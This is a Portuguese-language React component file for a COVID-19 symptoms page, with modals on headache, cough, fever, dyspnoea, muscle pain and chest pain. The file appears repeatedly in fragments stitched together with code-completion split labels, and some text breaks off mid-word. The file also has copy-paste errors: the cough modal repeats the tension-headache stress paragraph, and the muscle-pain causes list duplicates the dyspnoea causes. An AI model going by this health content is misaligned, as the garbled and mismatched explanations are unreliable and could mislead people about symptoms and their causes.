tumores, doenças autoimunes, reação a medicamentos, etc. O corpo humano
apresenta uma temperatura normal entre 36 e 37,5ºC. Ela sofre alterações
ao longo do dia, estando mais próxima de 36ºC durante a madrugada e mais
para 37,5ºC no final da tarde. Esta variação é chamada de ciclo
circadiano da temperatura corporal. Uma temperatura de 37,5ºC no início
da manhã tem muito mais relevância do que esta mesma temperatura no
final do dia. Algumas pessoas têm naturalmente temperaturas um pouco
mais elevadas que outras, podendo apresentar algo em torno de 37,5ºC ao
final do dia sem que isso tenha qualquer significado clínico. Por outro
lado, há aqueles que possuem temperatura basal mais baixa, às vezes
próximo de 35,5ºC. Nestes, uma temperatura de 37,5ºC é algo bem acima do
seu normal. Portanto, antes de se diagnosticar uma febre, é importante
saber qual a temperatura habitual do paciente. Consideramos febre a
elevação da temperatura corporal acima da média do paciente. Como muitas
vezes não temos um histórico da variação habitual da temperatura de cada
indivíduo, usamos os valores médios encontrados em estudos para definir
os limites de temperatura que indicam febre. É importante termos em
mente também que o modo como medirmos a temperatura corporal pode
fornecer resultados diferentes. Quanto mais próximo do centro do corpo,
maior será a temperatura.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">
Quais são as principais causas de febre?
</h6>
<p className="text-dark">
As causas mais comuns de febre são as infecções. Doenças como pneumonia,
meningite, pielonefrite e endocardite (infecção das válvulas do coração)
costumam vir acompanhadas de febre alta e debilidade física. Gripe, ao
contrário do resfriado, também pode ser causa de febre alta (leia:
Diferenças entre gripe e resfriado). Quadros de febre prolongada,
normalmente por volta dos 38ºC, às vezes intermitentes ou somente
noturna, associada à perda de peso, em geral indicam infecções como
tuberculose ou AIDS. Câncer, leucemia e linfoma podem causar febre baixa
ou febrículas prolongadas. Doenças autoimunes, como lúpus, artrite
reumatoide também causam febre. Vários medicamentos podem causar febre,
incluindo antibióticos e anti-inflamatórios, por mais paradoxal que isso
possa parecer. Normalmente são reações individuais aos componentes da
droga, em um processo semelhante a uma alergia. Algumas causas menos
comuns de febre incluem:
<ul>
<li>Hipertireoidismo.</li>
<li>Excesso de exposição solar.</li>
<li>Cirurgias.</li>
<li> Traumas.</li>
<li>Feocromocitoma.</li>
<li>Embolia pulmonar.</li>
<li>Desidratação.</li>
<li>AVC (com lesão do hipotálamo).</li>
<li>Hepatite por álcool.</li>
</ul>
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppFe() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Febre
</button>
<Three show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//quarta
const Four = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Dispneia?</h4>
<p className="text-dark">
Dispneia é a sensação de falta de ar, dificuldade de respirar ou
respiração incompleta. Geralmente essa sensação é originada por doenças
cardíacas e/ou pulmonares, mas pode ser causada por diversas outras
condições. A dispneia pode ser classificada em aguda, crônica, dispneia
de esforço, de repouso e suspirosa.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">Causas de dispneia</h6>
<ul className="text-dark">
<li>
Baixa concentração de oxigênio no ar, como em grandes altitudes;
</li>
<li>Obstrução das vias aéreas;</li>
<li>Doença cardíaca;</li>
<li> Problemas no pulmão;</li> | hematológicas.
</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppDi() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dispneia
</button>
<Four show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//quinta
const Five = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body className="text-dark">
<h4 className="my-2">O que é Dor muscular?</h4>
<p className="">
A dor muscular (CID 10 M79. 1) é comum e pode envolver mais de um
músculo. Ela pode, também, envolver ligamentos, tendões e fáscias, os
tecidos moles que conectam os músculos e ossos. Pode acontecer em muitas
partes do corpo como perna, coxa, ombro, costas, pescoço, entre outros.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="mt-5">Causas</h6>
<p>
A dor muscular está mais frequentemente relacionada a tensão, uso
excessivo ou lesão muscular por exercício ou trabalho fisicamente
desgastante. Nessas situações, a dor tende a envolver músculos
específicos e começa durante ou logo após a atividade. Em geral a
atividade que está causando a dor muscular é óbvia. Porém, muitas vezes
o exercício ou postura que a desencadeiam é difícil de ser de ser
reconhecido. A dor muscular também pode ser um sinal de condições que
afetam todo seu corpo, como algumas infecções (incluindo a gripe). Uma
causa comum que muitas vezes é confundida com dor muscular é a
fibromialgia, uma condição que modifica o sistema que reconhece a dor
causando dores muitas vezes generalizadas, distúrbio do sono, fadiga e
dor de cabeça. Mas inúmeras causas podem levar à dor muscular. Veja
algumas:
</p>
<ul className="">
<li>
Baixa concentração de oxigênio no ar, como em grandes altitudes;
</li>
<li>Obstrução das vias aéreas;</li>
<li>Doença cardíaca;</li>
<li> Problemas no pulmão;</li>
<li>Doenças neurológicas;</li>
<li>Medicamentos;</li>
<li>
Entre outras que levam a incapacidade do sangue carrear o oxigênio
pelo corpo, como na anemia grave, sangramentos e doenças
hematológicas.
</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppMu() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dor Muscular
</button>
<Five show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//sexta
const Six = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body className="text-dark">
<h4 className="my-2">O que é Dor no Peito?</h4>
<p className="">
Dor no peito (CID 10 - R07) é o desconforto ou dor que uma pessoa sente
na parte frontal do corpo, geralmente abaixo do pescoço e acima do
abdômen superior. Nem sempre é sintoma de infarto, podendo ser sintoma
de outras doenças e condições. Além disso, pode vir acompanhado de falta
de ar, tontura, entre outros. A dor no peito pode atingir diferentes
intensidades e migrar para outras partes do corpo, como as costas, o
pescoço e ambos os braços. Os sintomas da dor no peito variam de acordo
com a causa da dor. Majoritariamente, a dor no peito é relacionada a
algum problema no coração. Nesses casos, os sintomas mais comuns são:
</p>
<ul>
<li>Sensação de aperto no coração</li>
<li>
Dor que se espalha pelo corpo, em regiões como costas, pescoço, nuca,
ombros e braços (especialmente o esquerdo)
</li>
<li>
Dor recorrente, que dura por alguns minutos, desaparece e retorna,
variando sempre de intensidade
</li>
<li>Pode vir junto com falta de ar, tontura, náusea e sudorese.</li>
</ul>
<h6>Alguns sintomas sugerem ser não cardíacos, como:</h6>
<ul>
<li>Gosto amargo na boca</li>
<li>Dificuldade de deglutição</li>
<li>Dor que varia de intensidade conforme você muda de posição</li>
<li>Dor que se agrava quando você respira fundo ou tosse</li>
<li>Sensibilidade na região do peito.</li>
</ul>
<Image src={Nurse} className="nurse__img" />
<h6 className="mt-5">Causas</h6>
<p>
Existem diversas causas possíveis para a dor no peito. Ela também pode
estar diretamente relacionada a alguns órgãos.
</p>
<p>Causas ligadas ao coração:</p>
<ul className="">
<li>Infarto </li>
<li>Angina</li>
<li>Dissecção aórtica</li>
<li>Pericardite.</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppPe() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dor no Peito
</button>
<Six show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
export default Symptoms; | <li>Doenças neurológicas;</li>
<li>Medicamentos;</li>
<li>
Entre outras que levam a incapacidade do sangue carrear o oxigênio
pelo corpo, como na anemia grave, sangramentos e doenças | random_line_split |
symptoms.js | import React from "react";
import { Container, Col, Row, Image, Modal, Button } from "react-bootstrap";
import ImgSymptoms from "../assets/sick.png";
import ImgSymptomsCircle from "../assets/Circle.svg";
import "../components/symptoms.scss";
import Nurse from "../assets/nurse.svg";
const Symptoms = () => (
<Container>
<Col className="py-5">
<Col className="text-right m-5">
<h2 className="m-5">Sintomas do COVID-19</h2>
</Col>
<Row className="d-flex align-items-center">
<Col className="text-left" lg={3}>
<section classsName="icons__symptons ">
<AppCe />
</section>
<section classsName="icons__symptons ">
<AppTo />
</section>
<section classsName="icons__symptons ">
<AppFe />
</section>
</Col>
<Col
className="img__symptoms d-flex align-items-center justify-content-center "
lg={6}
>
<Image src={ImgSymptomsCircle} className="img__circle" />
<Image src={ImgSymptoms} />
</Col>
<Col className="text-right" lg={3}>
<section classsName="icons__symptons">
<AppDi />
</section>
<section classsName="icons__symptons">
<AppMu />
</section>
<section classsName="icons__symptons">
<AppPe />
</section>
</Col>
</Row>
</Col>
</Container>
);
//primeiro item
const One = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark">O que é Cefaleia tensional?</h4>
<p className="text-dark">
A cefaleia tensional é geralmente uma dor difusa, de leve a moderada
intensidade na sua cabeça, muitas vezes descrita como a sensação de uma
faixa apertando o crânio. A cefaleia tensional é o tipo mais comum de
dor de cabeça, e suas causas não são bem compreendidas. De acordo com a
Sociedade Brasileira de Cefaleia, cerca de 38% a 74% dos brasileiros
sofrem com cefaleia tensional.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark">Causas</h6>
<p className="text-dark">
{" "}
Não há uma causa única para dor de cabeça tensional. Este tipo de dor de
cabeça não é uma característica hereditária que ocorre em famílias. Em
algumas pessoas, dores de cabeça de tensão são causados pela contração
involuntária e crônica de músculos na parte de trás do pescoço e do
couro cabeludo. Essa tensão muscular pode ser causada por:
<ul>
<li> Repouso insuficiente </li>
<li> Má postura </li>
<li> Estresse emocional ou mental, incluindo</li>
<li> depressão </li>
<li> Ansiedade </li>
<li> Cansaço </li>
<li> Fome </li>
<li> Excesso de exercícios. </li>
</ul>
Dores de cabeça tensionais são geralmente desencadeadas por algum tipo
de estresse de origem externa ou interna. Exemplos de fatores de
estresse incluem: Ter problemas em casa / vida familiar difícil Estar
esperando um filho ou filha Preparar-se para testes ou exames Voltar de
férias Iniciar um novo trabalho Perder um emprego Estar insatisfeito com
o próprio corpo Prazos no trabalho Competição em esportes ou outras
atividades Ser perfeccionista Não dormir o suficiente Se envolver em
muitas atividades / organizações. A cefaleia tensional episódica
geralmente acontece por uma situação estressante isolada ou um acúmulo
de estresse. Estar exposto ao estresse diariamente pode levar à cefaleia
tensional crônica.
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppCe() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Cefalea
</button>
<One show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//segundo item de opção
const Tow = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Tosse?</h4>
<p className="text-dark">
Há dois tipos de tosse: a seca e a produtiva. É a presença ou não de
muco que estabelece a diferença. Na tosse produtiva a secreção se
movimenta e é eliminada; na seca, esse catarro parece não existir. É
importante avaliar se a tosse é realmente seca, ou se a secreção não
flui por desidratação ou tratamento incorreto.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">Causas da Tosse</h6>
<p className="text-dark">
O fumo é a principal causa, porque aumenta o volume de muco produzido
pelos brônquios; causa irritação física e química das mucosas; destrói
os cílios que cobrem o revestimento interno dos brônquios; facilita o
acúmulo de material estranho às vias aéreas. Outras causas importantes
são a sinusite, principalmente em crianças, a síndrome do gotejamento
pós-nasal, a asma, o refluxo gastroesofágico, infecções respiratórias,
bronquite crônica e medicamentos para controle da hipertensão.
<h6 className="my-4">RECOMENDAÇÕES EM CASO DE TOSSE</h6>
<ul>
<li>
{" "}
Beba bastante água. A água é o melhor antitussígeno que se conhece,
pois facilita a movimentação do muco sobre a camada de cílios;{" "}
</li>
<li>
{" "}
Dê preferência aos líquidos quentes, que costumam trazer alívio
sintomático, como os chás de nossas avós: chá com limão e mel, de
camomila, erva cidreira, erva doce, entre outros. Chá-preto e
chá-mate devem ser evitados por causa do alto teor de cafeína;{" "}
</li>
<li>
{" "}
Mantenha a cabeça elevada à noite, usando travesseiros extras ou
levantando a cabeceira da cama com calços;
</li>
<li> Mantenha os ambientes bem ventilados;</li>
<li>
{" "}
Aumente o teor de umidade do ar com umidificadores ou vaporizadores.
Tome banhos quentes prolongados para respirar bastante vapor;
</li>
<li>
{" "}
Não tome remédios por conta própria. Procure assistência médica para
diagnóstico e tratamento.
</li>
</ul>
Dores de cabeça tensionais são geralmente desencadeadas por algum tipo
de estresse de origem externa ou interna. Exemplos de fatores de
estresse incluem: Ter problemas em casa / vida familiar difícil Estar
esperando um filho ou filha Preparar-se para testes ou exames Voltar de
férias Iniciar um novo trabalho Perder um emprego Estar insatisfeito com
o próprio corpo Prazos no trabalho Competição em esportes ou outras
atividades Ser perfeccionista Não dormir o suficiente Se envolver em
muitas atividades / organizações. A cefaleia tensional episódica
geralmente acontece por uma situação estressante isolada ou um acúmulo
de estresse. Estar exposto ao estresse diariamente pode levar à cefaleia
tensional crônica.
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppTo() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Tosse
</button>
<Tow show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//terceiro
const Three = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Febre?</h4>
<p className="text-dark">
A febre é um dos sinais clínicos mais comuns no ser humano e se
caracteriza por uma elevação acima da média da temperatura corporal. A
febre é tão comum que a maioria de nós nunca parou para pensar no seu
real significado. PUBLICIDADE Geralmente associada à infecção, a febre
também pode ocorrer em diversas outras situações, como em caso de
tumores, doenças autoimunes, reação a medicamentos, etc. O corpo humano
apresenta uma temperatura normal entre 36 e 37,5ºC. Ela sofre alterações
ao longo do dia, estando mais próxima de 36ºC durante a madrugada e mais
para 37,5ºC no final da tarde. Esta variação é chamada de ciclo
circadiano da temperatura corporal. Uma temperatura de 37,5ºC no início
da manhã tem muito mais relevância do que esta mesma temperatura no
final do dia. Algumas pessoas têm naturalmente temperaturas um pouco
mais elevadas que outras, podendo apresentar algo em torno de 37,5ºC ao
final do dia sem que isso tenha qualquer significado clínico. Por outro
lado, há aqueles que possuem temperatura basal mais baixa, às vezes
próximo de 35,5ºC. Nestes, uma temperatura de 37,5ºC é algo bem acima do
seu normal. Portanto, antes de se diagnosticar uma febre, é importante
saber qual a temperatura habitual do paciente. Consideramos febre a
elevação da temperatura corporal acima da média do paciente. Como muitas
vezes não temos um histórico da variação habitual da temperatura de cada
indivíduo, usamos os valores médios encontrados em estudos para definir
os limites de temperatura que indicam febre. É importante termos em
mente também que o modo como medirmos a temperatura corporal pode
fornecer resultados diferentes. Quanto mais próximo do centro do corpo,
maior será a temperatura.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">
Quais são as principais causas de febre?
</h6>
<p className="text-dark">
As causas mais comuns de febre são as infecções. Doenças como pneumonia,
meningite, pielonefrite e endocardite (infecção das válvulas do coração)
costumam vir acompanhadas de febre alta e debilidade física. Gripe, ao
contrário do resfriado, também pode ser causa de febre alta (leia:
Diferenças entre gripe e resfriado). Quadros de febre prolongada,
normalmente por volta dos 38ºC, às vezes intermitentes ou somente
noturna, associada à perda de peso, em geral indicam infecções como
tuberculose ou AIDS. Câncer, leucemia e linfoma podem causar febre baixa
ou febrículas prolongadas. Doenças autoimunes, como lúpus, artrite
reumatoide também causam febre. Vários medicamentos podem causar febre,
incluindo antibióticos e anti-inflamatórios, por mais paradoxal que isso
possa parecer. Normalmente são reações individuais aos componentes da
droga, em um processo semelhante a uma alergia. Algumas causas menos
comuns de febre incluem:
<ul>
<li>Hipertireoidismo.</li>
<li>Excesso de exposição solar.</li>
<li>Cirurgias.</li>
<li> Traumas.</li>
<li>Feocromocitoma.</li>
<li>Embolia pulmonar.</li>
<li>Desidratação.</li>
<li>AVC (com lesão do hipotálamo).</li>
<li>Hepatite por álcool.</li>
</ul>
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppFe() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Febre
</button>
<Three show={modalShow} onHide={() | className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Dispneia?</h4>
<p className="text-dark">
Dispneia é a sensação de falta de ar, dificuldade de respirar ou
respiração incompleta. Geralmente essa sensação é originada por doenças
cardíacas e/ou pulmonares, mas pode ser causada por diversas outras
condições. A dispneia pode ser classificada em aguda, crônica, dispneia
de esforço, de repouso e suspirosa.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">Causas de dispneia</h6>
<ul className="text-dark">
<li>
Baixa concentração de oxigênio no ar, como em grandes altitudes;
</li>
<li>Obstrução das vias aéreas;</li>
<li>Doença cardíaca;</li>
<li> Problemas no pulmão;</li>
<li>Doenças neurológicas;</li>
<li>Medicamentos;</li>
<li>
Entre outras que levam a incapacidade do sangue carrear o oxigênio
pelo corpo, como na anemia grave, sangramentos e doenças
hematológicas.
</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppDi() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dispneia
</button>
<Four show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//quinta
const Five = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body className="text-dark">
<h4 className="my-2">O que é Dor muscular?</h4>
<p className="">
A dor muscular (CID 10 M79. 1) é comum e pode envolver mais de um
músculo. Ela pode, também, envolver ligamentos, tendões e fáscias, os
tecidos moles que conectam os músculos e ossos. Pode acontecer em muitas
partes do corpo como perna, coxa, ombro, costas, pescoço, entre outros.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="mt-5">Causas</h6>
<p>
A dor muscular está mais frequentemente relacionada a tensão, uso
excessivo ou lesão muscular por exercício ou trabalho fisicamente
desgastante. Nessas situações, a dor tende a envolver músculos
específicos e começa durante ou logo após a atividade. Em geral a
atividade que está causando a dor muscular é óbvia. Porém, muitas vezes
o exercício ou postura que a desencadeiam é difícil de ser de ser
reconhecido. A dor muscular também pode ser um sinal de condições que
afetam todo seu corpo, como algumas infecções (incluindo a gripe). Uma
causa comum que muitas vezes é confundida com dor muscular é a
fibromialgia, uma condição que modifica o sistema que reconhece a dor
causando dores muitas vezes generalizadas, distúrbio do sono, fadiga e
dor de cabeça. Mas inúmeras causas podem levar à dor muscular. Veja
algumas:
</p>
<ul className="">
<li>
Baixa concentração de oxigênio no ar, como em grandes altitudes;
</li>
<li>Obstrução das vias aéreas;</li>
<li>Doença cardíaca;</li>
<li> Problemas no pulmão;</li>
<li>Doenças neurológicas;</li>
<li>Medicamentos;</li>
<li>
Entre outras que levam a incapacidade do sangue carrear o oxigênio
pelo corpo, como na anemia grave, sangramentos e doenças
hematológicas.
</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppMu() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dor Muscular
</button>
<Five show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//sexta
const Six = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body className="text-dark">
<h4 className="my-2">O que é Dor no Peito?</h4>
<p className="">
Dor no peito (CID 10 - R07) é o desconforto ou dor que uma pessoa sente
na parte frontal do corpo, geralmente abaixo do pescoço e acima do
abdômen superior. Nem sempre é sintoma de infarto, podendo ser sintoma
de outras doenças e condições. Além disso, pode vir acompanhado de falta
de ar, tontura, entre outros. A dor no peito pode atingir diferentes
intensidades e migrar para outras partes do corpo, como as costas, o
pescoço e ambos os braços. Os sintomas da dor no peito variam de acordo
com a causa da dor. Majoritariamente, a dor no peito é relacionada a
algum problema no coração. Nesses casos, os sintomas mais comuns são:
</p>
<ul>
<li>Sensação de aperto no coração</li>
<li>
Dor que se espalha pelo corpo, em regiões como costas, pescoço, nuca,
ombros e braços (especialmente o esquerdo)
</li>
<li>
Dor recorrente, que dura por alguns minutos, desaparece e retorna,
variando sempre de intensidade
</li>
<li>Pode vir junto com falta de ar, tontura, náusea e sudorese.</li>
</ul>
<h6>Alguns sintomas sugerem ser não cardíacos, como:</h6>
<ul>
<li>Gosto amargo na boca</li>
<li>Dificuldade de deglutição</li>
<li>Dor que varia de intensidade conforme você muda de posição</li>
<li>Dor que se agrava quando você respira fundo ou tosse</li>
<li>Sensibilidade na região do peito.</li>
</ul>
<Image src={Nurse} className="nurse__img" />
<h6 className="mt-5">Causas</h6>
<p>
Existem diversas causas possíveis para a dor no peito. Ela também pode
estar diretamente relacionada a alguns órgãos.
</p>
<p>Causas ligadas ao coração:</p>
<ul className="">
<li>Infarto </li>
<li>Angina</li>
<li>Dissecção aórtica</li>
<li>Pericardite.</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppPe() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dor no Peito
</button>
<Six show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
export default Symptoms;
| => setModalShow(false)} />
</>
);
}
//quarta
const Four = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" | identifier_body |
symptoms.js | import React from "react";
import { Container, Col, Row, Image, Modal, Button } from "react-bootstrap";
import ImgSymptoms from "../assets/sick.png";
import ImgSymptomsCircle from "../assets/Circle.svg";
import "../components/symptoms.scss";
import Nurse from "../assets/nurse.svg";
const Symptoms = () => (
<Container>
<Col className="py-5">
<Col className="text-right m-5">
<h2 className="m-5">Sintomas do COVID-19</h2>
</Col>
<Row className="d-flex align-items-center">
<Col className="text-left" lg={3}>
<section classsName="icons__symptons ">
<AppCe />
</section>
<section classsName="icons__symptons ">
<AppTo />
</section>
<section classsName="icons__symptons ">
<AppFe />
</section>
</Col>
<Col
className="img__symptoms d-flex align-items-center justify-content-center "
lg={6}
>
<Image src={ImgSymptomsCircle} className="img__circle" />
<Image src={ImgSymptoms} />
</Col>
<Col className="text-right" lg={3}>
<section classsName="icons__symptons">
<AppDi />
</section>
<section classsName="icons__symptons">
<AppMu />
</section>
<section classsName="icons__symptons">
<AppPe />
</section>
</Col>
</Row>
</Col>
</Container>
);
//primeiro item
const One = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark">O que é Cefaleia tensional?</h4>
<p className="text-dark">
A cefaleia tensional é geralmente uma dor difusa, de leve a moderada
intensidade na sua cabeça, muitas vezes descrita como a sensação de uma
faixa apertando o crânio. A cefaleia tensional é o tipo mais comum de
dor de cabeça, e suas causas não são bem compreendidas. De acordo com a
Sociedade Brasileira de Cefaleia, cerca de 38% a 74% dos brasileiros
sofrem com cefaleia tensional.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark">Causas</h6>
<p className="text-dark">
{" "}
Não há uma causa única para dor de cabeça tensional. Este tipo de dor de
cabeça não é uma característica hereditária que ocorre em famílias. Em
algumas pessoas, dores de cabeça de tensão são causados pela contração
involuntária e crônica de músculos na parte de trás do pescoço e do
couro cabeludo. Essa tensão muscular pode ser causada por:
<ul>
<li> Repouso insuficiente </li>
<li> Má postura </li>
<li> Estresse emocional ou mental, incluindo</li>
<li> depressão </li>
<li> Ansiedade </li>
<li> Cansaço </li>
<li> Fome </li>
<li> Excesso de exercícios. </li>
</ul>
Dores de cabeça tensionais são geralmente desencadeadas por algum tipo
de estresse de origem externa ou interna. Exemplos de fatores de
estresse incluem: Ter problemas em casa / vida familiar difícil Estar
esperando um filho ou filha Preparar-se para testes ou exames Voltar de
férias Iniciar um novo trabalho Perder um emprego Estar insatisfeito com
o próprio corpo Prazos no trabalho Competição em esportes ou outras
atividades Ser perfeccionista Não dormir o suficiente Se envolver em
muitas atividades / organizações. A cefaleia tensional episódica
geralmente acontece por uma situação estressante isolada ou um acúmulo
de estresse. Estar exposto ao estresse diariamente pode levar à cefaleia
tensional crônica.
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppCe() {
const [modalShow, setModalShow] = React | tate(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Cefalea
</button>
<One show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//segundo item de opção
const Tow = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Tosse?</h4>
<p className="text-dark">
Há dois tipos de tosse: a seca e a produtiva. É a presença ou não de
muco que estabelece a diferença. Na tosse produtiva a secreção se
movimenta e é eliminada; na seca, esse catarro parece não existir. É
importante avaliar se a tosse é realmente seca, ou se a secreção não
flui por desidratação ou tratamento incorreto.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">Causas da Tosse</h6>
<p className="text-dark">
O fumo é a principal causa, porque aumenta o volume de muco produzido
pelos brônquios; causa irritação física e química das mucosas; destrói
os cílios que cobrem o revestimento interno dos brônquios; facilita o
acúmulo de material estranho às vias aéreas. Outras causas importantes
são a sinusite, principalmente em crianças, a síndrome do gotejamento
pós-nasal, a asma, o refluxo gastroesofágico, infecções respiratórias,
bronquite crônica e medicamentos para controle da hipertensão.
<h6 className="my-4">RECOMENDAÇÕES EM CASO DE TOSSE</h6>
<ul>
<li>
{" "}
Beba bastante água. A água é o melhor antitussígeno que se conhece,
pois facilita a movimentação do muco sobre a camada de cílios;{" "}
</li>
<li>
{" "}
Dê preferência aos líquidos quentes, que costumam trazer alívio
sintomático, como os chás de nossas avós: chá com limão e mel, de
camomila, erva cidreira, erva doce, entre outros. Chá-preto e
chá-mate devem ser evitados por causa do alto teor de cafeína;{" "}
</li>
<li>
{" "}
Mantenha a cabeça elevada à noite, usando travesseiros extras ou
levantando a cabeceira da cama com calços;
</li>
<li> Mantenha os ambientes bem ventilados;</li>
<li>
{" "}
Aumente o teor de umidade do ar com umidificadores ou vaporizadores.
Tome banhos quentes prolongados para respirar bastante vapor;
</li>
<li>
{" "}
Não tome remédios por conta própria. Procure assistência médica para
diagnóstico e tratamento.
</li>
</ul>
Dores de cabeça tensionais são geralmente desencadeadas por algum tipo
de estresse de origem externa ou interna. Exemplos de fatores de
estresse incluem: Ter problemas em casa / vida familiar difícil Estar
esperando um filho ou filha Preparar-se para testes ou exames Voltar de
férias Iniciar um novo trabalho Perder um emprego Estar insatisfeito com
o próprio corpo Prazos no trabalho Competição em esportes ou outras
atividades Ser perfeccionista Não dormir o suficiente Se envolver em
muitas atividades / organizações. A cefaleia tensional episódica
geralmente acontece por uma situação estressante isolada ou um acúmulo
de estresse. Estar exposto ao estresse diariamente pode levar à cefaleia
tensional crônica.
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppTo() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Tosse
</button>
